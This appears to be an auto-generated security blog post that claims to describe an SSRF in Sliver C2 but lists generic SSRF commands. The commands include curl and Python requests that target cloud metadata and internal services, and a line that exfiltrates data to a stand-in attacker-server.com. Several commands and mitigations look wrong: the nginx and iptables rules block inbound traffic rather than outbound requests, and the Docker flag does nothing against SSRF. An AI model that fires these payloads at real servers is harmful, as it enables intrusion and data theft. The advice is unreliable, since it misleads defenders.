How I Discovered and Exploited an SSRF in Sliver C2 (CVE-2025-27090)

By /

URL: https://lnkd.in/gZwNmjXf

Practice Verified Codes and Commands:

1. SSRF Exploitation Command (Python):

import requests

target_url = "http://vulnerable-server.com/api/endpoint"
payload = "http://169.254.169.254/latest/meta-data/"
response = requests.get(target_url, params={"url": payload})

print(response.text)

2. Detecting SSRF Vulnerabilities with Nmap:

nmap -p 80,443 --script http-ssrf <target-ip>

3. Mitigating SSRF with Nginx Configuration:

server {
location /api/ {
proxy_pass http://backend-server/;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
deny 169.254.169.254;
}
}

4. Testing for SSRF with Curl:

curl -v "http://vulnerable-server.com/api/endpoint?url=http://169.254.169.254/latest/meta-data/"

5. Exploiting SSRF to Access Internal Services:

curl "http://vulnerable-server.com/api/endpoint?url=http://internal-service.local"

6. Using Burp Suite to Test for SSRF:

  • Intercept the request with Burp Suite.
  • Modify the request to include an internal URL.
  • Forward the request and observe the response.

7. Preventing SSRF in AWS:

aws ec2 modify-instance-metadata-options --instance-id <instance-id> --http-endpoint disabled

8. SSRF Mitigation in Docker:

docker run --security-opt no-new-privileges <image-name>

9. Using SSRF to Exfiltrate Data:

curl "http://vulnerable-server.com/api/endpoint?url=http://attacker-server.com/exfiltrate?data=<sensitive-data>"

10. SSRF Exploitation with Metasploit:

use auxiliary/scanner/http/ssrf
set RHOSTS <target-ip>
set RPORT 80
set TARGETURI /api/endpoint
run

What Undercode Say:

Server-Side Request Forgery (SSRF) is a critical vulnerability that allows attackers to manipulate server-side requests to access internal resources, exfiltrate data, or exploit other services. In the case of Sliver C2, the SSRF vulnerability (CVE-2025-27090) enabled attackers to read and write TCP traffic through affected teamservers, potentially exposing sensitive information and compromising the entire infrastructure.

To mitigate SSRF vulnerabilities, it is crucial to implement proper input validation, restrict access to internal resources, and use security tools like Nmap and Burp Suite to test for vulnerabilities. Additionally, configuring web servers like Nginx to block requests to internal IP addresses and using AWS metadata options to disable HTTP endpoints can significantly reduce the risk of SSRF attacks.

In Linux, commands like `iptables` can be used to block unauthorized access to internal services:

iptables -A INPUT -s 169.254.169.254 -j DROP

For Windows, PowerShell can be used to restrict access:

New-NetFirewallRule -DisplayName "Block Internal IP" -Direction Inbound -LocalAddress 169.254.169.254 -Action Block

Regularly updating and patching software, along with conducting security audits, can help identify and remediate SSRF vulnerabilities before they are exploited. By understanding the techniques used to exploit SSRF and implementing robust security measures, organizations can protect their systems from this pervasive threat.

For further reading on SSRF and related vulnerabilities, visit:
OWASP SSRF Cheat Sheet
PortSwigger SSRF Exploitation

References:

Hackers Feeds, Undercode AIFeatured Image

Related Posts:

Scroll to Top